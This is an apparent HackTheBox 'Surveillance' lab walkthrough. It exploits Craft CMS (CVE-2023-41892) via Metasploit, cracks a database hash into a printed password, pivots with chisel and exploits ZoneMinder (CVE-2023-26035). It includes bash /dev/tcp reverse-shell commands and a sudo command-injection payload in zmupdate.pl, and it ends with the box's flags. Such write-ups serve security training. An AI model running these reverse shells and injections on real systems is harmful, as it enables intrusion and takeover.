We covered the walkthrough of HackTheBox Surveillance where we demonstrated the exploitation of the recent vulnerability CVE-2023-41892 that affected Craft CMS in addition to the exploitation of CVE-2023-26035 that affected ZoneMinder which is an integrated set of applications which provide a complete surveillance solution allowing capture, analysis, recording and monitoring of any CCTV or security cameras attached to a Linux based machine.
Before we start, add the host IP to the hosts file with the machine name
echo '10.10.11.245 surveillance.htb' | sudo tee -a /etc/hosts
Scanning and Enumeration
Nmap scan results are below
Command: nmap -Pn -p- —
# Nmap 7.94SVN scan initiated Wed Jan 24 16:36:46 2024 as: nmap -Pn -p- --min-rate 5000 -A -oN nmap.txt 10.10.11.245
Nmap scan report for 10.10.11.245
Host is up (0.012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 96:07:1c:c6:77:3e:07:a0:cc:6f:24:19:74:4d:57:0b (ECDSA)
|_ 256 0b:a4:c0:cf:e2:3b:95:ae:f6:f5:df:7d:0c:88:d6:ce (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://surveillance.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/24%OT=22%CT=1%CU=42608%PV=Y%DS=2%DC=T%G=Y%TM=65B1
OS:830B%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)
OS:OPS(O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53C
OS:ST11NW7%O6=M53CST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
OS:ECN(R=Y%DF=Y%T=40%W=FAF0%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%
OS:F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T
OS:5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=
OS:Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF
OS:=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40
OS:%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 143/tcp)
HOP RTT ADDRESS
1 11.81 ms 10.10.14.1
2 11.87 ms 10.10.11.245
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 24 16:37:15 2024 -- 1 IP address (1 host up) scanned in 29.07 seconds
On port 80, we have an nginx server
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://surveillance.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Browsing to the main webserver page shows that it’s a potentially a Craft CMS server
Additionally, the admin page can be found by running a directory enumeration using Gobuster using the below command
gobuster dir -u http://surveillance.htb -w /usr/share/seclists/Discovery/Web-Content/big.txt -x php,txt,html -r -o gobuster-80.txt -t 100
And the admin page, can be found at: /admin/login
Craft CMS Vulnerability Exploitation
What is Craft CMS?
Craft CMS is a Content Management System that is easy and clear. It offers every mechanism needed to do the everyday chores needed for a functional website. Content integration is going to be hassle-free, no doubt.
The version of the Craft CMS is vulnerable to CVE-2023-41892 with this POC available publicly.
Understanding The Exploit
- The
getTmpUploadDirAndDocumentRoot()
allows you to executephpinfo
which reads the main web root in addition to the upload directory. - The
writePayloadToTempFile(documentRoot)
function yieldsHTTP 502
HTTP error indicating successful exploit. We can write arbitrary PHP code to the site root as though it were an image by using the vulnerable Imagick extension. - The
trigerImagick(tmpDir)
function performs a call to the Imagick extension to read our PHP file. The Imagick extension then reads our file and executes the PHP code.
Some people reported problems running the exploit so if this happened with you, you can then follow the Metasploit method outlined below.
Craft CMS Vulnerability Exploitation with Metasploit
sudo msfconsole
Then choose exploit/linux/http/craftcms_unauth_rce_cve_2023_41892
msf6 > use 1
msf6 > set rhosts surveillance.htb
msf6 > set rport 80
msf6 > set ssl false
msf6 > set lhost tun0
msf6 > set lport 443
msf6 > run
And it should be done and you can move on to post exploitation and privilege escalation phase.
Post Exploitation & Privilege Escalation
Running whoami and uname -a shows the below output as to the operating system and user running on the machine
PRETTY_NAME="Ubuntu 22.04.3 LTS"
NAME="Ubuntu"
VERSION_ID="22.04"
VERSION="22.04.3 LTS (Jammy Jellyfish)"
VERSION_CODENAME=jammy
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=jammy
Linux surveillance 5.15.0-89-generic #99-Ubuntu SMP Mon Oct 30 20:42:41 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
uid=33(www-data) gid=33(www-data) groups=33(www-data)
After some OS enumeration, we noticed an SQL backup in the below path
/var/www/html/craft/storage/backups/surveillance--2023-10-17-202801--v4.4.14.sql.zip
This database contained an unsalted SHA256 hash for user matthew
.
You can verify this by running below command
cat /var/www/html/craft/storage/backups/surveillance--2023-10-17-202801--v4.4.14.sql.zip | grep -i matt
Password Cracking with JohnTheRipper
Execute below commands to add the hash into a file and crack it using John with rockyou.txt wordlist.
echo '39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec' > hash
john --format=Raw-SHA256 --wordlist=rockyou.txt hash
You will find that the password is starcraftt122490 then we use it to log in as matthew.
ssh matthew@surveillance.htb
Network Pivoting & Lateral Movement
By running netstat to figure out the network connections internally, we found that The zoneminder
service is listening on 127.0.0.1:8080
This which will require us use port forwarding to be able to interact with this service.
We can use chisel
which you can download and run using below commands
wget https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_linux_amd64.gz -O chisel.gz
gunzip ./chisel.gz
chmod u+x ./chisel.gz
sudo python3 -m http.server 80
We host chisel on the attacker machine to be able to download it to the htb machine.
wget http://kali-vpn-ip/chisel -O /tmp/chisel
chmod u+x /tmp/chisel
Then we can run chisel
with below command on the attacker machine:
sudo ./chisel server --reverse --port 8081 &
And on the HTB machine
/tmp/chisel client 10.10.14.10:8081 R:99090:127.0.0.1:8080 R:3306:127.0.0.1:3006 &
If all is done well, you should be able to navigate to 127.0.0.1:99090 to access the ZoneMinder Service whose version appears to be 1.36.32.
ZoneMinder Exploitation
What is ZoneMinder?
ZoneMinder is an integrated set of applications which provide a complete surveillance solution allowing capture, analysis, recording and monitoring of any CCTV or security cameras attached to a Linux based machine. It is designed to run on distributions which support the Video For Linux (V4L) interface and has been tested with video cameras attached to BTTV cards, various USB cameras and also supports most IP network cameras.
A little bit of researching and Googling shows that its a vulnerable version CVE-2023-26035
To get the exploit to work, just change line 16 from index.php
to /index.php
.
./zm-pwn.py --target http://127.0.0.1:99090 --cmd "bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/4444 0>&1'"
Of course don’t forget to run a listener on your machine using netcat
nc- lvp 4444
Doing this will get you shell as zoneminder user.
Note that any zm[a-zA-Z]*.pl script in /usr/bin/ can be run without a password by the zoneminder user.
You often encounter PHP scripts abusing the exec(), shell_exec(), or system() APIs to execute commands on the host.
When looking for Perl scripts to accomplish this, we found the exec() command.
The only issue is that, save from one script, none of these employ this command, and it is not vulnerable.
These Perl scripts do seem to frequently reference the execute() command, and from what I’ve looked up, it’s used to execute prepared SQL statements. Finding an execute() call that accepts a user parameter and does not limit the user to particular data types or inputs will thus be necessary.
The perl script zmupdate.pl that is susceptible. Where the script will take our username input and run it is on line 1056. The script will hash the inputs, therefore trying to exploit on a password won’t work.
If we execute the below command, we can see the ‘/bin/bash -ip’ injected into the prepared SQL statement
sudo /usr/bin/zmupdate.pl -u '/bin/bash -ip' -p '' -v 1
So this means if we run the command in a sub-shell it will be evaluated before the rest of the prepared SQL statement.
sudo /usr/bin/zmupdate.pl -u '$(bash -c "bash -ip >& /dev/tcp/10.10.14.10/443 0>&1")' -p '' -v 1
HackTheBox Surveillance Root & User Flags
User Flag
1f4b734f81280d55388c9ff39cd13152
Root Flag
3457f277222b96dc0f126f9d92defe37
HackTheBox CTF Walkthrough Playlist